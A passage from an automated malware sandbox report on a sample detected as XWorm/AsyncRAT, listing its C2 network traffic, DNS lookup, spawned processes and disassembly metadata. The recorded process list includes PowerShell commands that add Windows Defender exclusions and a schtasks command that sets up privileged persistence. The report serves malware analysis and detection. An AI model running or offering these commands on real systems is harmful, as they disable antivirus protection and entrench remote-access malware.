                                                                Dec 14, 2024 18:55:42.295285940 CET4979024891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:42.296703100 CET4984224891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:42.421380043 CET2489149790147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:42.422430992 CET2489149842147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:42.422610044 CET4984224891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:42.469079971 CET4984224891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:42.591227055 CET2489149842147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:55:55.670514107 CET4984224891192.168.2.4147.185.221.24
                                                                Dec 14, 2024 18:55:55.790405035 CET2489149842147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:56:04.325500011 CET2489149842147.185.221.24192.168.2.4
                                                                Dec 14, 2024 18:56:04.325577021 CET4984224891192.168.2.4147.185.221.24

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 14, 2024 18:54:56.499934912 CET4934353192.168.2.41.1.1.1
                                                                Dec 14, 2024 18:54:56.774451017 CET53493431.1.1.1192.168.2.4

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Dec 14, 2024 18:54:56.499934912 CET192.168.2.41.1.1.10x45b9Standard query (0)if-sensors.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Dec 14, 2024 18:54:56.774451017 CET1.1.1.1192.168.2.40x45b9No error (0)if-sensors.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:12:53:57
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\Desktop\72OWK7wBVH.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Users\user\Desktop\72OWK7wBVH.exe"
                                                                Imagebase:0x510000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1683334094.0000000000512000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                Reputation:low
                                                                Has exited:false

                                                                General

                                                                Target ID:1
                                                                Start time:12:54:00
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\72OWK7wBVH.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:12:54:00
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:4
                                                                Start time:12:54:07
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '72OWK7wBVH.exe'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:12:54:07
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:7
                                                                Start time:12:54:17
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\SYSTEM'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:8
                                                                Start time:12:54:17
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:11
                                                                Start time:12:54:33
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'SYSTEM'
                                                                Imagebase:0x7ff788560000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:12
                                                                Start time:12:54:33
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:13
                                                                Start time:12:54:54
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\schtasks.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "SYSTEM" /tr "C:\Users\user\AppData\Roaming\SYSTEM"
                                                                Imagebase:0x7ff76f990000
                                                                File size:235'008 bytes
                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:14
                                                                Start time:12:54:54
                                                                Start date:14/12/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7699e0000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:15
                                                                Start time:12:54:55
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Imagebase:0xf10000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\SYSTEM, Author: ditekSHen
                                                                Antivirus matches:
                                                                • Detection: 100%, Avira
                                                                • Detection: 100%, Joe Sandbox ML
                                                                • Detection: 76%, ReversingLabs
                                                                Has exited:true

                                                                General

                                                                Target ID:16
                                                                Start time:12:55:01
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Imagebase:0xe40000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:12:56:00
                                                                Start date:14/12/2024
                                                                Path:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Users\user\AppData\Roaming\SYSTEM
                                                                Imagebase:0x6c0000
                                                                File size:72'704 bytes
                                                                MD5 hash:0860112F7BD00567371FAFFE18061CAB
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:21.3%
                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:6
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 4355 7ffd9b7f2dd8 4357 7ffd9b7f2de1 SetWindowsHookExW 4355->4357 4358 7ffd9b7f2eb1 4357->4358 4351 7ffd9b7f2aad 4352 7ffd9b7f2b10 RtlSetProcessIsCritical 4351->4352 4354 7ffd9b7f2b92 4352->4354

                                                                  Executed Functions

                                                                  Function 00007FFD9B7F1190 Relevance: 2.0, Strings: 1, Instructions: 755COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CAM_^
                                                                  • API String ID: 0-3136481660
                                                                  • Opcode ID: 52544dc973b5bed0655b88cc6033bcdba5b6f70407fc7dd065483b350c52395e
                                                                  • Instruction ID: 5793db62723e7aafc3f45c0f96655d3de9888952e009027bc746442c2684ad15
                                                                  • Opcode Fuzzy Hash: 52544dc973b5bed0655b88cc6033bcdba5b6f70407fc7dd065483b350c52395e
                                                                  • Instruction Fuzzy Hash: A432FA61B19A4D4FE798EB7C8479ABD7BD1FF98300F450579E04DC32E6DE28A8018781
                                                                  Function 00007FFD9B7F8016 Relevance: .5, Instructions: 471COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 284 7ffd9b7f8016-7ffd9b7f8023 285 7ffd9b7f8025-7ffd9b7f802d 284->285 286 7ffd9b7f802e-7ffd9b7f80f7 284->286 285->286 289 7ffd9b7f80f9-7ffd9b7f8102 286->289 290 7ffd9b7f8163 286->290 289->290 291 7ffd9b7f8104-7ffd9b7f8110 289->291 292 7ffd9b7f8165-7ffd9b7f818a 290->292 293 7ffd9b7f8149-7ffd9b7f8161 291->293 294 7ffd9b7f8112-7ffd9b7f8124 291->294 299 7ffd9b7f818c-7ffd9b7f8195 292->299 300 7ffd9b7f81f6 292->300 293->292 295 7ffd9b7f8128-7ffd9b7f813b 294->295 296 7ffd9b7f8126 294->296 295->295 298 7ffd9b7f813d-7ffd9b7f8145 295->298 296->295 298->293 299->300 301 7ffd9b7f8197-7ffd9b7f81a3 299->301 302 7ffd9b7f81f8-7ffd9b7f82a0 300->302 303 7ffd9b7f81dc-7ffd9b7f81f4 301->303 304 7ffd9b7f81a5-7ffd9b7f81b7 301->304 313 7ffd9b7f82a2-7ffd9b7f82ac 302->313 314 7ffd9b7f830e 302->314 303->302 305 7ffd9b7f81bb-7ffd9b7f81ce 304->305 306 7ffd9b7f81b9 304->306 305->305 308 7ffd9b7f81d0-7ffd9b7f81d8 305->308 306->305 308->303 313->314 315 7ffd9b7f82ae-7ffd9b7f82bb 313->315 316 7ffd9b7f8310-7ffd9b7f8339 314->316 317 7ffd9b7f82f4-7ffd9b7f830c 315->317 318 7ffd9b7f82bd-7ffd9b7f82cf 315->318 323 7ffd9b7f833b-7ffd9b7f8346 316->323 324 7ffd9b7f83a3 316->324 317->316 319 7ffd9b7f82d3-7ffd9b7f82e6 318->319 320 7ffd9b7f82d1 318->320 319->319 322 7ffd9b7f82e8-7ffd9b7f82f0 319->322 320->319 322->317 323->324 326 7ffd9b7f8348-7ffd9b7f8356 323->326 325 7ffd9b7f83a5-7ffd9b7f8436 324->325 334 7ffd9b7f843c-7ffd9b7f844b 325->334 327 7ffd9b7f8358-7ffd9b7f836a 326->327 328 7ffd9b7f838f-7ffd9b7f83a1 326->328 330 7ffd9b7f836c 327->330 331 7ffd9b7f836e-7ffd9b7f8381 327->331 328->325 330->331 331->331 332 7ffd9b7f8383-7ffd9b7f838b 331->332 332->328 335 7ffd9b7f8453-7ffd9b7f84b8 call 7ffd9b7f84d4 334->335 336 7ffd9b7f844d 334->336 343 7ffd9b7f84ba 335->343 344 7ffd9b7f84bf-7ffd9b7f84d3 335->344 336->335 343->344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 978c2c73cfc4b56bf2d85197d3a3923e4df93b17830738d21e18faa04918f0d1
                                                                  • Instruction ID: 041ce2248000267a300077145cbf642dc0708e3c6b4a9f65c3b088f873af555f
                                                                  • Opcode Fuzzy Hash: 978c2c73cfc4b56bf2d85197d3a3923e4df93b17830738d21e18faa04918f0d1
                                                                  • Instruction Fuzzy Hash: 26F1A530A09A4D8FEBA8DF28C855BE97BD1FF54310F04436EE85DC72A5DB34A9458B81
                                                                  Function 00007FFD9B7F8DC2 Relevance: .5, Instructions: 457COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 461 7ffd9b7f8dc2-7ffd9b7f8dcf 462 7ffd9b7f8dda-7ffd9b7f8ea7 461->462 463 7ffd9b7f8dd1-7ffd9b7f8dd9 461->463 466 7ffd9b7f8ea9-7ffd9b7f8eb2 462->466 467 7ffd9b7f8f13 462->467 463->462 466->467 468 7ffd9b7f8eb4-7ffd9b7f8ec0 466->468 469 7ffd9b7f8f15-7ffd9b7f8f3a 467->469 470 7ffd9b7f8ef9-7ffd9b7f8f11 468->470 471 7ffd9b7f8ec2-7ffd9b7f8ed4 468->471 476 7ffd9b7f8f3c-7ffd9b7f8f45 469->476 477 7ffd9b7f8fa6 469->477 470->469 472 7ffd9b7f8ed8-7ffd9b7f8eeb 471->472 473 7ffd9b7f8ed6 471->473 472->472 475 7ffd9b7f8eed-7ffd9b7f8ef5 472->475 473->472 475->470 476->477 479 7ffd9b7f8f47-7ffd9b7f8f53 476->479 478 7ffd9b7f8fa8-7ffd9b7f8fcd 477->478 486 7ffd9b7f903b 478->486 487 7ffd9b7f8fcf-7ffd9b7f8fd9 478->487 480 7ffd9b7f8f8c-7ffd9b7f8fa4 479->480 481 7ffd9b7f8f55-7ffd9b7f8f67 479->481 480->478 483 7ffd9b7f8f6b-7ffd9b7f8f7e 481->483 484 7ffd9b7f8f69 481->484 483->483 485 7ffd9b7f8f80-7ffd9b7f8f88 483->485 484->483 485->480 489 7ffd9b7f903d-7ffd9b7f906b 486->489 487->486 488 7ffd9b7f8fdb-7ffd9b7f8fe8 487->488 490 7ffd9b7f8fea-7ffd9b7f8ffc 488->490 491 7ffd9b7f9021-7ffd9b7f9039 488->491 495 7ffd9b7f90db 489->495 496 7ffd9b7f906d-7ffd9b7f9078 489->496 493 7ffd9b7f9000-7ffd9b7f9013 490->493 494 7ffd9b7f8ffe 490->494 491->489 493->493 497 7ffd9b7f9015-7ffd9b7f901d 493->497 494->493 499 7ffd9b7f90dd-7ffd9b7f91b5 495->499 496->495 498 7ffd9b7f907a-7ffd9b7f9088 496->498 497->491 500 7ffd9b7f908a-7ffd9b7f909c 498->500 501 7ffd9b7f90c1-7ffd9b7f90d9 498->501 509 7ffd9b7f91bb-7ffd9b7f91ca 499->509 502 7ffd9b7f90a0-7ffd9b7f90b3 500->502 503 7ffd9b7f909e 500->503 501->499 502->502 505 7ffd9b7f90b5-7ffd9b7f90bd 502->505 503->502 505->501 510 7ffd9b7f91cc 509->510 511 7ffd9b7f91d2-7ffd9b7f9234 call 7ffd9b7f9250 509->511 510->511 518 7ffd9b7f923b-7ffd9b7f924f 511->518 519 7ffd9b7f9236 511->519 519->518
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43e40c9cb0c23e6a7cafba672ef1fc13679230824db1b78522632d83f94e2387
                                                                  • Instruction ID: 3240d89282d807ae0bd6fccd5c257086830e03df019dba8bad1d0c37c2b76bdf
                                                                  • Opcode Fuzzy Hash: 43e40c9cb0c23e6a7cafba672ef1fc13679230824db1b78522632d83f94e2387
                                                                  • Instruction Fuzzy Hash: 15E19330A09A4E8FEBA8DF28C855BF97BD1EF54310F14426ED84DC72A5CE7899458B81
                                                                  Function 00007FFD9B7F2AAD Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 172 7ffd9b7f2aad-7ffd9b7f2b90 RtlSetProcessIsCritical 175 7ffd9b7f2b98-7ffd9b7f2bcd 172->175 176 7ffd9b7f2b92 172->176 176->175
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 2161b781865d1a5811173491abfb5a5893ddb89b0779bbb3b93394475b6a6fe5
                                                                  • Instruction ID: 95528d4913bbc1a4567858cbb91c2a7169a97c3b131319e4cc3374c93db4e440
                                                                  • Opcode Fuzzy Hash: 2161b781865d1a5811173491abfb5a5893ddb89b0779bbb3b93394475b6a6fe5
                                                                  • Instruction Fuzzy Hash: 0241253190C6588FCB19DF98C845BE9BBF0FF96311F04416EE08AC3592CB786846CB91
                                                                  Function 00007FFD9B7F2DD8 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 178 7ffd9b7f2dd8-7ffd9b7f2ddf 179 7ffd9b7f2dea-7ffd9b7f2e5d 178->179 180 7ffd9b7f2de1-7ffd9b7f2de9 178->180 183 7ffd9b7f2ee9-7ffd9b7f2eed 179->183 184 7ffd9b7f2e63-7ffd9b7f2e70 179->184 180->179 185 7ffd9b7f2e72-7ffd9b7f2eaf SetWindowsHookExW 183->185 184->185 187 7ffd9b7f2eb7-7ffd9b7f2ee8 185->187 188 7ffd9b7f2eb1 185->188 188->187
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2992089184.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_72OWK7wBVH.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 5293510ea037ecd997c46ece42c359c6442112a729fadc7566a179cd2cd78e5f
                                                                  • Instruction ID: 70ddc6b8d4ea73807dbbe53272dd26b889e3dd64d1f22e59eadb5d6dc4aa3040
                                                                  • Opcode Fuzzy Hash: 5293510ea037ecd997c46ece42c359c6442112a729fadc7566a179cd2cd78e5f
                                                                  • Instruction Fuzzy Hash: EB31D630A1CA5D4FDB18EF98D85A6F97BE1EB59321F10427EE05DD3292CA74A81287C1

                                                                  Executed Functions

                                                                  Function 00007FFD9B8C6605 Relevance: .4, Instructions: 440COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1003449acfa712a28e83f355b18e99ae182658f3450a6e12ffe35b9790530abe
                                                                  • Instruction ID: 95124ff619291c62c04ce1f78527a8f332325665c1bdf49851f7590b78589590
                                                                  • Opcode Fuzzy Hash: 1003449acfa712a28e83f355b18e99ae182658f3450a6e12ffe35b9790530abe
                                                                  • Instruction Fuzzy Hash: D4D135F2A0FA8E4FEB65ABA848745B57BA1EF6A310B1901FFD45CC70E3D914A905C341
                                                                  Function 00007FFD9B7F9758 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4ebc7d601e407085011b80287cb7f9df06ede78e104abb799fdaf7160c34273
                                                                  • Instruction ID: 3306c71a1c6a70b9687a7afdd40c5ce493567087ea1361533da3b711e1bde97c
                                                                  • Opcode Fuzzy Hash: b4ebc7d601e407085011b80287cb7f9df06ede78e104abb799fdaf7160c34273
                                                                  • Instruction Fuzzy Hash: EB310931A1DB4C4FDB5C9F5C984A6B97BE1FB98311F04422FE44983262DA31A955CBC2
                                                                  Function 00007FFD9B6DE380 Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1781613807.00007FFD9B6DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6DD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b6dd000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f3801be1b9efe1047ef0ab232ca9782540012faa9fce6606a8fcb942b1c71bb1
                                                                  • Instruction ID: 5627c3a1804162db188233f1bbd4bb5932807f818163f2ae995b9b51c051405f
                                                                  • Opcode Fuzzy Hash: f3801be1b9efe1047ef0ab232ca9782540012faa9fce6606a8fcb942b1c71bb1
                                                                  • Instruction Fuzzy Hash: 1F41037150EBC84FEB668B299C519623FB0EF52314B1702EFD0C8CB1A3D625B846C792
                                                                  Function 00007FFD9B7FA62C Relevance: .1, Instructions: 102COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f2021cc844fc2993037091b89c88f3fe0e22e194867b7e4484fb351e55d6ceb
                                                                  • Instruction ID: c077424e5749412f714837d4fdc14325fd05b79ed989fa7b68469eb975acce0b
                                                                  • Opcode Fuzzy Hash: 8f2021cc844fc2993037091b89c88f3fe0e22e194867b7e4484fb351e55d6ceb
                                                                  • Instruction Fuzzy Hash: CA210C3190C74C4FDB59DF9C984A7E97FF0EB96321F04426BD449C3162DA74641ACB91
                                                                  Function 00007FFD9B7F33B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782298881.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7f0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction ID: f015c6d8f1291ae9f9a84129c24d6f916cfece872e45c549876b83854877da12
                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                  • Instruction Fuzzy Hash: D001A73020CB0C4FD748EF0CE051AA5B7E0FF85360F10056DE58AC36A1DA32E882CB45
                                                                  Function 00007FFD9B8C414D Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f69708b3e679aa14e79a9f3830c39709c1e2b18625d2d8513c0fae1ab36bb8f3
                                                                  • Instruction ID: 7a7df74ff58b9a50a537767b160d3269233454dd4fd6b5d2948254ce2cf2c742
                                                                  • Opcode Fuzzy Hash: f69708b3e679aa14e79a9f3830c39709c1e2b18625d2d8513c0fae1ab36bb8f3
                                                                  • Instruction Fuzzy Hash: 4CF09A32B0E5098FD768EB5CE4518A873E0EF5932071600BBE0ADC75B3CA25EC808780
                                                                  Function 00007FFD9B8C4400 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1782895233.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b8c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1ba78c1ac94e44744a7c1fb43680fb0051af5e734e40b9758d2c8b0680dd4976
                                                                  • Instruction ID: e4fbf44bb38b53c8b25aa3f64a42391c1ad9612c598efa424671fe116f23c72b
                                                                  • Opcode Fuzzy Hash: 1ba78c1ac94e44744a7c1fb43680fb0051af5e734e40b9758d2c8b0680dd4976
